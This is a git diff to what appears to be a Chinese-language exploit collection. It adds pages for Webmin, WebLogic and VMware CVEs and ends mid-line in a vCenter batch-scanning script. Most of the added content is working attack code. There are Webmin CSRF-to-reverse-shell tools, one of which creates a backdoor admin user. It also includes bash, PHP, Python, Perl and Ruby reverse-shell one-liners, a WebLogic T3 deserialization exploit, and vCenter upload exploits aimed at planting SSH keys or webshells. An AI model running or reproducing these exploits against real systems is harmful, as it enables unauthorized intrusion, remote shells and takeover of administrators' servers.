diff --git a/CMS漏洞/ZZZCMS parserSearch 远程命令执行漏洞.md b/CMS漏洞/ZZZCMS parserSearch 远程命令执行漏洞.md
index 1bc98a3..2f5a6cb 100644
--- a/CMS漏洞/ZZZCMS parserSearch 远程命令执行漏洞.md
+++ b/CMS漏洞/ZZZCMS parserSearch 远程命令执行漏洞.md
@@ -4,6 +4,11 @@
 ZZZCMS parserSearch 存在模板注入导致远程命令执行漏洞
+参考链接:
+
+- https://srcincite.io/advisories/src-2021-0015/
+- https://nvd.nist.gov/vuln/detail/CVE-2021-32605
+
 ## 漏洞影响
 ```
diff --git a/README.md b/README.md
index c903d7e..f3e085d 100644
--- a/README.md
+++ b/README.md
@@ -287,6 +287,7 @@
 * Webmin password_change.cgi 远程命令执行漏洞 CVE-2019-15107
 * Webmin rpc.cgi 后台远程命令执行漏洞 CVE-2019-15642
 * Webmin update.cgi 后台远程命令执行漏洞 CVE-2022-0824
+ * Webmin 多个高危漏洞 CVE-2021-31760~62
 * WiseGiga NAS down_data.php 任意文件下载漏洞
 * WiseGiga NAS group.php 远程命令执行漏洞
 * WSO2 fileupload 任意文件上传漏洞 CVE-2022-29464
@@ -434,6 +435,7 @@
 * PayaraMicro microprofile-config.properties 信息泄漏漏洞 CVE-2021-41381
 * Weblogic LDAP 远程代码执行漏洞 CVE-2021-2109
 * WebLogic Local File Inclusion 本地文件包含漏洞 CVE-2022-21371
+ * Weblogic Server远程代码执行漏洞 CVE-2020-14756
 * Weblogic SSRF漏洞 CVE-2014-4210
 * WebLogic T3 反序列化漏洞 CVE-2016-3510
 * Weblogic XMLDecoder 远程代码执行漏洞 CVE-2017-10271
@@ -500,16 +502,23 @@
 * Saltstack 未授权RCE漏洞 CVE-2021-25281~25283
 * SaltStack 未授权访问命令执行漏洞 CVE-2020-16846 25592
 * Saltstack 远程命令执行漏洞 CVE-2020-11651 11652
+ * VMware vCenter Server 服务器端请求伪造漏洞 CVE-2021-21973
+ * VMware vCenter Server 远程代码执行漏洞 CVE-2021-21972
 * VMware vCenter 任意文件读取漏洞
+ * VMware View Planner 未授权RCE CVE-2021-21978
 * VMware vRealize Operations Manager SSRF漏洞 CVE-2021-21975
 * VMware Workspace ONE Access SSTI漏洞 CVE-2022-22954
 * VoIPmonitor 远程命令执行漏洞 CVE-2021-30461
+ * Wazuh Manager 代码执行漏洞 CVE-2021-26814
 * Windows Chrome 远程命令执行漏洞
 * WordPress 3DPrint Lite 3dprint-lite-functions.php 任意文件上传漏洞
 * WordPress All-in-One Video Gallery video.php 任意文件读取漏洞 CVE-2022-2633
 * WordPress Duplicator duplicator.php 任意文件读取漏洞 CVE-2020-11738
+ * WordPress Elementor Page Builder Plus 身份验证绕过 CVE-2021-24175
+ * WordPress File Manager<6.9 RCE CVE-2020-25213
 * WordPress Redux Framework class-redux-helpers.php 敏感信息泄漏漏洞 CVE-2021-38314
 * WordPress Simple File List ee-downloader.php 任意文件读取漏洞 CVE-2022-1119
+ * WordPress SuperForms 4.9 任意文件上传到远程代码执行
 * WordPress WP_Query SQL 注入漏洞 CVE-2022-21661
 * 向日葵 check 远程命令执行漏洞 CNVD-2022-10270
 - 网络设备漏洞
diff --git a/Web应用漏洞/Webmin 多个高危漏洞 CVE-2021-31760~62.md b/Web应用漏洞/Webmin 多个高危漏洞 CVE-2021-31760~62.md
new file mode 100644
index 0000000..5d53277
--- /dev/null
+++ b/Web应用漏洞/Webmin 多个高危漏洞 CVE-2021-31760~62.md
@@ -0,0 +1,486 @@ +# Webmin 多个高危漏洞 CVE-2021-31760~62 + +## 漏洞描述 + +CVE-2021-31760:利用CSRF攻击,实现对Webmin的远程命令执行。 + +CVE-2021-31761:利用XSS攻击,实现对Webmin的远程命令执行。 + +CVE-2021-31762:利用CSRF攻击,通过Webmin的添加用户功能创建特权用户,然后通过特权用户权限反弹shell。 + +参考链接: + +- CVE-2021-31760:https://github.com/electronicbots/CVE-2021-31760 +- CVE-2021-31761:https://github.com/electronicbots/CVE-2021-31761 +- CVE-2021-31762:https://github.com/electronicbots/CVE-2021-31762 + +## 漏洞影响 + +``` +Webmin <= 1.973 +``` + +## FOFA + +``` +app="Webmin" +``` + +## 漏洞复现 + +CVE-2021-31760 poc: + +```python +import time, subprocess,random + +print('''\033[1;37m + + __ __ _ ____ _ _________ _ _ _ +| \/ | | | |___ \| | |___ / _ \| | | | | | +| \ / | ___ ___| |__ __) | | / / | | | | __| |_ _ ___| | __ +| |\/| |/ _ \/ __| '_ \ |__ <| | / /| | | | |/ _` | | | |/ __| |/ / +| | | | __/\__ \ | | |___) | | _ _ / /_| |_| | | (_| | |_| | (__| < +|_| |_|\___||___/_| |_|____/|_| (_|_) /_____\___/|_|\__,_|\__, |\___|_|\_/ + __/ | + |___/ + + \033[1;m''') + +for i in range(101): + print( + "\r\033[1;36m [>] POC By \033[1;m \033[1;37mMesh3l\033[1;m \033[1;36m ( \033[1;m\033[1;37m@Mesh3l_911\033[1;m\033[1;36m ) & \033[1;m \033[1;37mZ0ldyck\033[1;m\033[1;36m ( \033[1;m\033[1;37m@electronicbots\033[1;m\033[1;36m ) \033[1;m {} \033[1;m".format( + i), "\033[1;36m%\033[1;m", end="") + time.sleep(0.02) +print("\n\n") + +target = input( + "\033[1;36m \n Please input ur target's webmin path e.g. ( https://webmin.Mesh3l-Mohammed.com/ ) > \033[1;m") + +if target.endswith('/'): + target = target + 'proc/run.cgi' +else: + target = target + '/proc/run.cgi' + +ip = input("\033[1;36m \n Please input ur IP to set up the Reverse Shell e.g. ( 10.10.10.10 ) > \033[1;m") + +port = input("\033[1;36m \n Please input a Port to set up the Reverse Shell e.g. 
( 1337 ) > \033[1;m") + +ReverseShell = input \ +('''\033[1;37m +\n +1- Bash Reverse Shell \n +2- PHP Reverse Shell \n +3- Python Reverse Shell \n +4- Perl Reverse Shell \n +5- Ruby Reverse Shell \n +\033[1;m + +\033[1;36mPlease insert the number Reverse Shell's type u want e.g. ( 1 ) > \033[1;m''') + +file_name = random.randrange(1000) + +if ReverseShell == '1': + ReverseShell = 'mkfifo /tmp/'+str(file_name)+'; nc '+ip+' '+port+' 0/tmp/'+str(file_name)+' 2>&1; rm /tmp/'+str(file_name)+'' + +elif ReverseShell == '2': + ReverseShell = ''' php -r '$sock=fsockopen("''' + ip + '''",''' + port + ''');exec("/bin/sh -i <&3 >&3 2>&3");' ''' + +elif ReverseShell == '3': + ReverseShell = ''' python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("''' + ip + '''",''' + port + '''));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' ''' + +elif ReverseShell == '4': + ReverseShell = ''' perl -e 'use Socket;$i="''' + ip + '''";$p=''' + port + ''';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' ''' + +elif ReverseShell == '5': + ReverseShell = ''' ruby -rsocket -e'f=TCPSocket.open("''' + ip + '''",''' + port + ''').to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' ''' + +else: + print("\033[1;36m \n Please Re-Check ur input :( \033[1;m \n") + + +def CSRF_Generator(): + with open('CSRF_POC.html', 'w') as POC: + POC.write \ + (''' + + + + + + + +
+ + + + + + +
+ + + + + + ''') + POC.close() + + print( + "\033[1;36m\nThe CSRF_POC has been generated successfully , send it to a Webmin's Admin and wait for your Reverse Shell ^_^ \n \033[1;m") + + +def Netcat_listener(): + print() + subprocess.run(["nc", "-nlvp "+port+""]) + + +def main(): + CSRF_Generator() + Netcat_listener() + + +if __name__ == '__main__': + main() +``` + +CVE-2021-31761 poc: + +```python +import time, subprocess,random,urllib.parse + + +print('''\033[1;37m + + __ __ _ ____ _ _________ _ _ _ +| \/ | | | |___ \| | |___ / _ \| | | | | | +| \ / | ___ ___| |__ __) | | / / | | | | __| |_ _ ___| | __ +| |\/| |/ _ \/ __| '_ \ |__ <| | / /| | | | |/ _` | | | |/ __| |/ / +| | | | __/\__ \ | | |___) | | _ _ / /_| |_| | | (_| | |_| | (__| < +|_| |_|\___||___/_| |_|____/|_| (_|_) /_____\___/|_|\__,_|\__, |\___|_|\_/ + __/ | + |___/ + + \033[1;m''') + +for i in range(101): + print( + "\r\033[1;36m [>] POC By \033[1;m \033[1;37mMesh3l\033[1;m \033[1;36m ( \033[1;m\033[1;37m@Mesh3l_911\033[1;m\033[1;36m ) & \033[1;m \033[1;37mZ0ldyck\033[1;m\033[1;36m ( \033[1;m\033[1;37m@electronicbots\033[1;m\033[1;36m ) \033[1;m {} \033[1;m".format( + i), "\033[1;36m%\033[1;m", end="") + time.sleep(0.02) +print("\n\n") + +target = input( + "\033[1;36m \n Please input ur target's webmin path e.g. ( https://webmin.Mesh3l-Mohammed.com/ ) > \033[1;m") + +if target.endswith('/'): + target = target + 'tunnel/link.cgi/' +else: + target = target + '/tunnel/link.cgi/' + +ip = input("\033[1;36m \n Please input ur IP to set up the Reverse Shell e.g. ( 10.10.10.10 ) > \033[1;m") + +port = input("\033[1;36m \n Please input a Port to set up the Reverse Shell e.g. ( 1337 ) > \033[1;m") + +ReverseShell = input \ +('''\033[1;37m +\n +1- Bash Reverse Shell \n +2- PHP Reverse Shell \n +3- Python Reverse Shell \n +4- Perl Reverse Shell \n +5- Ruby Reverse Shell \n +\033[1;m + +\033[1;36mPlease insert the number Reverse Shell's type u want e.g. 
( 1 ) > \033[1;m''') + +file_name = random.randrange(1000) + +if ReverseShell == '1': + ReverseShell = 'mkfifo /tmp/'+str(file_name)+'; nc '+ip+' '+port+' 0/tmp/'+str(file_name)+' 2>&1; rm /tmp/'+str(file_name)+'' + +elif ReverseShell == '2': + ReverseShell = ''' php -r '$sock=fsockopen("''' + ip + '''",''' + port + ''');exec("/bin/sh -i <&3 >&3 2>&3");' ''' + +elif ReverseShell == '3': + ReverseShell = ''' python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("''' + ip + '''",''' + port + '''));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' ''' + +elif ReverseShell == '4': + ReverseShell = ''' perl -e 'use Socket;$i="''' + ip + '''";$p=''' + port + ''';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' ''' + +elif ReverseShell == '5': + ReverseShell = ''' ruby -rsocket -e'f=TCPSocket.open("''' + ip + '''",''' + port + ''').to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' ''' + +else: + print("\033[1;36m \n Please Re-Check ur input :( \033[1;m \n") + + +def CSRF_Generator(): + Payload = urllib.parse.quote(''' + + + + + + + +
+ + + + + + +
+ + + + + + ''') + + print("\033[1;36m\nHere's ur link , send it to a Webmin's Admin and wait for ur Reverse Shell ^_^ \n \n\033[1;m") + + print(target+Payload) + +def Netcat_listener(): + print() + subprocess.run(["nc", "-nlvp "+port+""]) + + +def main(): + CSRF_Generator() + Netcat_listener() + + +if __name__ == '__main__': + main() +``` + +CVE-2021-31762 poc: + +```python +import time + +print('''\033[1;37m + + __ __ _ ____ _ _________ _ _ _ +| \/ | | | |___ \| | |___ / _ \| | | | | | +| \ / | ___ ___| |__ __) | | / / | | | | __| |_ _ ___| | __ +| |\/| |/ _ \/ __| '_ \ |__ <| | / /| | | | |/ _` | | | |/ __| |/ / +| | | | __/\__ \ | | |___) | | _ _ / /_| |_| | | (_| | |_| | (__| < +|_| |_|\___||___/_| |_|____/|_| (_|_) /_____\___/|_|\__,_|\__, |\___|_|\_/ + __/ | + |___/ + + \033[1;m''') + +for i in range(101): + print( + "\r\033[1;36m [>] POC By \033[1;m \033[1;37mMesh3l\033[1;m \033[1;36m ( \033[1;m\033[1;37m@Mesh3l_911\033[1;m\033[1;36m ) & \033[1;m \033[1;37mZ0ldyck\033[1;m\033[1;36m ( \033[1;m\033[1;37m@electronicbots\033[1;m\033[1;36m ) \033[1;m {} \033[1;m".format( + i), "\033[1;36m%\033[1;m", end="") + time.sleep(0.02) +print("\n\n") + +target = input( + "\033[1;36m \nPlease input ur target's webmin path e.g. ( https://webmin.Mesh3l-Mohammed.com/ ) > \033[1;m") + +if target.endswith('/'): + target = target + 'acl/save_user.cgi' +else: + target = target + '/acl/save_user.cgi' + + +def CSRF_Generator(): + with open('CSRF_POC.html', 'w') as POC: + POC.write \ + (''' + + + + + + + +
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + + ''') + POC.close() + + print( + "\033[1;36m\nThe CSRF_POC has been generated successfully , send it to a Webmin's Admin and ur privileged user creds would be \n\nUsername: \033[1;m\033[1;37mMesh3l_Z0ldyck\033[1;m\n\033[1;36mPassword:\033[1;m \033[1;37mMesh3l_Z0ldyck123\n\033[1;m\n\n\033[1;36mHappy Hunting ^_^ \n\033[1;m") + + + +def main(): + CSRF_Generator() + + +if __name__ == '__main__': + main() +``` + diff --git a/Web服务器漏洞/Weblogic Server远程代码执行漏洞 CVE-2020-14756.md b/Web服务器漏洞/Weblogic Server远程代码执行漏洞 CVE-2020-14756.md new file mode 100644 index 0000000..e0aedf8 --- /dev/null +++ b/Web服务器漏洞/Weblogic Server远程代码执行漏洞 CVE-2020-14756.md 
@@ -0,0 +1,116 @@ +# Weblogic Server 远程代码执行漏洞 CVE-2020-14756 + +## 漏洞描述 + +weblogic的T3协议反序列化漏洞一直是一个比较热门也比较好用的漏洞,weblogic针对该漏洞的解决方案就是不断填充黑名单,在高版本jdk下配合jep290机制实现黑名单,在低版本下配合resolveClass进行防御,所以安全人员对于T3反序列化的利用也是一直在寻找黑名单之外的利用链。 + +CVE-2020-14756 这个漏洞的利用比较巧妙,通过利用weblogic coherence组件中的类,绕过了黑名单机制的检测,重新能够利用黑名单中的类,造成代码执行。 + +参考链接: + +- https://www.oracle.com/security-alerts/cpujan2021.html#AppendixFMW +- https://github.com/Y4er/CVE-2020-14756 + +## 漏洞影响 + +``` +Oracle Weblogic Server 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0 +``` + +## 漏洞复现 + +CVE_2020_14756.java: + +``` +package com.supeream; + +import com.supeream.serial.Serializables; +import com.supeream.weblogic.T3ProtocolOperation; +// coherence-rest.jar +import com.tangosol.coherence.rest.util.extractor.MvelExtractor; +// coherence-web.jar +import com.tangosol.coherence.servlet.AttributeHolder; +// coherence.jar +import com.tangosol.util.SortedBag; +import com.tangosol.util.aggregator.TopNAggregator; + +import java.io.File; +import java.io.FileOutputStream; +import java.io.ObjectOutputStream; +import java.lang.reflect.Field; +import java.lang.reflect.Method; + +public class CVE_2020_14756 { + public static void main(String[] args) { + MvelExtractor extractor = new MvelExtractor("java.lang.Runtime.getRuntime().exec(\"calc\");"); + MvelExtractor extractor2 = new MvelExtractor(""); + + try { + SortedBag sortedBag = new TopNAggregator.PartialResult(extractor2, 2); + AttributeHolder attributeHolder = new AttributeHolder(); + sortedBag.add(1); + + Field m_comparator = sortedBag.getClass().getSuperclass().getDeclaredField("m_comparator"); + m_comparator.setAccessible(true); + m_comparator.set(sortedBag, extractor); + + Method setInternalValue = attributeHolder.getClass().getDeclaredMethod("setInternalValue", Object.class); + setInternalValue.setAccessible(true); + setInternalValue.invoke(attributeHolder, sortedBag); + /* + FileOutputStream fileOutputStream = new FileOutputStream(new File("test.ser")); + 
ObjectOutputStream objectOutputStream = new ObjectOutputStream(fileOutputStream); + objectOutputStream.writeObject(attributeHolder); + */ + T3ProtocolOperation.send("192.168.65.128", "7001", Serializables.serialize(attributeHolder)); + + } catch (Exception e) { + e.printStackTrace(); + } + } +} +``` + +weblogic_t3.py: + +```py +#!/usr/bin/python +import socket +import os +import sys +import struct + +if len(sys.argv) < 3: + print 'Usage: python %s ' % os.path.basename(sys.argv[0]) + sys.exit() + +sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +sock.settimeout(5) + +server_address = (sys.argv[1], int(sys.argv[2])) +print '[+] Connecting to %s port %s' % server_address +sock.connect(server_address) + +# Send headers +headers='t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n' +print 'sending "%s"' % headers +sock.sendall(headers) + +data = sock.recv(1024) +print >>sys.stderr, 'received "%s"' % data + +payloadObj = open(sys.argv[3],'rb').read() + +payload='\x00\x00\x09\xf3\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x43\x2e\xc6\xa2\xa6\x39\x85\xb5\xaf\x7d\x63\xe6\x43\x83\xf4\x2a\x6d\x92\xc9\xe9\xaf\x0f\x94\x72\x02\x79\x73\x72\x00\x78\x72\x01\x78\x72\x02\x78\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x70\x70\x70\x70\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x06\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c
\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x03\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x03\x78\x70\x77\x02\x00\x00\x78\xfe\x01\x00\x00' +payload=payload+payloadObj +payload=payload+'\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x21\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x65\x65\x72\x49\x6e\x66\x6f\x58\x54\x74\xf3\x9b\xc9\x08\xf1\x02\x00\x07\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x74\x00\x27\x5b\x4c\x77\x65\x62\x6c\x6f\x67\x69\x63\x2f\x63\x6f\x6d\x6d\x6f\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\x3b\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x56\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x97\x22\x45\x51\x64\x52\x46\x3e\x02\x00\x03\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x71\x00\x7e\x00\x03\x4c\x00\x0e\x72\x65\x6c\x65\x61\x73\x65\x56\x65\x72\x73\x69\x6f\x6e\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x12\x76\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x41\x73\x42\x79\x74\x65\x73\x74\x00\x02\x5b\x42\x78\x72\x00
\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x71\x00\x7e\x00\x05\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x05\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x05\x78\x70\x77\x02\x00\x00\x78\xfe\x00\xff\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x46\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\x00\x0b\x75\x73\x2d\x6c\x2d\x62\x72\x65\x65\x6e\x73\xa5\x3c\xaf\xf1\x00\x00\x00\x07\x00\x00\x1b\x59\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x78\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x1d\x01\x81\x40\x12\x81\x34\xbf\x42\x76\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\xa5\x3c\xaf\xf1\x00\x00\x00\x00\x00\x78' + +# adjust header for appropriate message length +payload=struct.pack('>I',len(payload)) + payload[4:] + +print '[+] Sending payload...' +sock.send(payload) +data = sock.recv(1024) +print >>sys.stderr, 'received "%s"' % data +``` + diff --git a/服务器应用漏洞/VMware View Planner 未授权RCE CVE-2021-21978.md b/服务器应用漏洞/VMware View Planner 未授权RCE CVE-2021-21978.md new file mode 100644 index 0000000..0647c57 --- /dev/null +++ b/服务器应用漏洞/VMware View Planner 未授权RCE CVE-2021-21978.md 
@@ -0,0 +1,35 @@
+# VMware View Planner 未授权RCE CVE-2021-21978
+
+## 漏洞描述
+
+输入验证不正确以及缺少授权会导致在logupload Web应用程序中上传任意文件。具有对View Planner Harness的网络访问权限未经授权的攻击者可以上传并执行特制文件,从而导致在logupload容器中远程执行代码。
+
+参考链接:
+
+- https://www.vmware.com/security/advisories/VMSA-2021-0003.html
+
+## 漏洞复现
+
+poc:
+
+```
+POST /logupload?logMetaData={"itrLogPath":"../../../../../../etc/httpd/html/wsgi_log_upload","logFileType":"log_upload_wsgi.py","workloadID":"2"}
+
+Accept-Encoding:gzip,deflate
+Content-Type:multipart/form-data;boundary=---WebKitFormBoundaryH8GoragzRFVTw1VD
+
+
+------WebKitFormBoundaryH8GoragzRFVTw1VD
+Content-Disposition:form-data;name="logfile";filename=""
+Content-Type:text/plain
+
+#! /usr/bin/env python3
+import cgi
+import os,sys
+import logging
+import jsom
+
+....
+```
+
+![image-20221207141859357](images/image-20221207141859357.png)
\ No newline at end of file
diff --git a/服务器应用漏洞/VMware vCenter Server 服务器端请求伪造漏洞 CVE-2021-21973.md b/服务器应用漏洞/VMware vCenter Server 服务器端请求伪造漏洞 CVE-2021-21973.md
new file mode 100644
index 0000000..0c9c973
--- /dev/null
+++ b/服务器应用漏洞/VMware vCenter Server 服务器端请求伪造漏洞 CVE-2021-21973.md
@@ -0,0 +1,33 @@
+# VMware vCenter Server 服务器端请求伪造漏洞 CVE-2021-21973
+
+## 漏洞描述
+
+VMware vCenter Server 插件中对用户提供的输入验证不当,未经过身份验证的远程攻击者可以发送特制的 HTTP 请求,欺骗应用程序向任意系统发起请求。
+
+参考链接:
+
+* https://kb.vmware.com/s/article/82374
+* https://twitter.com/osama_hroot/status/1365586206982082560
+
+## 漏洞影响
+
+```
+vCenter Server: 6.5, 6.5 U1, 6.5 U3, 6.5.0, 6.5.0a, 6.5.0b, 6.5.0c, 6.5.0d, 6.5u2c, 6.7, 6.7 U3, 6.7.0, 6.7.0d, 6.7u3f, 7.0
+Cloud Foundation: before 3.10.1.2, 4.2
+```
+
+## 漏洞复现
+
+poc:
+
+```
+GET /ui/vropspluginui/rest/services/getvcdetails HTTP/1.1
+HOST:
+vcIP: SSRF
+vcUsername:sa
+vaPassword:sa
+reqResource:sa
+...
+```
+
+![image-20221207141353136](images/image-20221207141353136.png)
\ No newline at end of file
diff --git a/服务器应用漏洞/VMware vCenter Server 远程代码执行漏洞 CVE-2021-21972.md b/服务器应用漏洞/VMware vCenter Server 远程代码执行漏洞 CVE-2021-21972.md
new file mode 100644
index 0000000..665b5a9
--- /dev/null
+++ b/服务器应用漏洞/VMware vCenter Server 远程代码执行漏洞 CVE-2021-21972.md
@@ -0,0 +1,162 @@ +# VMware vCenter Server 远程代码执行漏洞 CVE-2021-21972 + +## 漏洞描述 + +由于对 vSphere vCenter Server中用户提供的输入的验证不足,因此存在该漏洞。远程非身份验证攻击者可以向端口 443/tcp 发送专门制作的 HTTP 请求,并在系统上执行任意代码。 + +参考链接: + +- https://blog.noah.360.net/vcenter-6-5-7-0-rce-lou-dong-fen-xi/ +- https://swarm.ptsecurity.com/unauth-rce-vmware/ +- https://www.vmware.com/security/advisories/VMSA-2021-0002.html + +## 漏洞影响 + +``` +VMware vCenter Server 7.0系列 < 7.0.U1c +VMware vCenter Server 6.7系列 < 6.7.U3l +VMware vCenter Server 6.5系列 < 6.5 U3n +``` + +## FOFA + +``` +app="vmware-vCenter" +``` + +## 漏洞复现 + +漏洞路径: + +``` +https://target/ui/vropspluginui/rest/services/uploadova +POST: name="uploadFile"; filename="xxx.tar" +``` + +构造POST包上传tar文件: + +![](images/16142224147525.jpg) + +Linux可以直接创建../../home/vsphere-ui/.ssh/authorized_keys TAR文件 后直接SSH连;Windows可以直接写入webshell。 + +批量检测脚本: + +- https://raw.githubusercontent.com/QmF0c3UK/CVE-2021-21972-vCenter-6.5-7.0-RCE-POC/main/CVE-2021-21972.py + +```python +#-*- coding:utf-8 -*- +banner = """ + 888888ba dP + 88 `8b 88 + a88aaaa8P' .d8888b. d8888P .d8888b. dP dP + 88 `8b. 88' `88 88 Y8ooooo. 88 88 + 88 .88 88. .88 88 88 88. 
.88 + 88888888P `88888P8 dP `88888P' `88888P' + ooooooooooooooooooooooooooooooooooooooooooooooooooooo + @time:2021/02/25 CVE-2021-21972.py + C0de by NebulabdSec - @batsu + """ +print(banner) + +import threadpool +import random +import argparse +import http.client +import urllib3 +import base64 +import requests + + +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) +http.client.HTTPConnection._http_vsn = 10 +http.client.HTTPConnection._http_vsn_str = 'HTTP/1.0' + +TARGET_URI = "/ui/vropspluginui/rest/services/uploadova" +def get_ua(): + first_num = random.randint(55, 62) + third_num = random.randint(0, 3200) + fourth_num = random.randint(0, 140) + os_type = [ + '(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)', '(X11; Linux x86_64)', + '(Macintosh; Intel Mac OS X 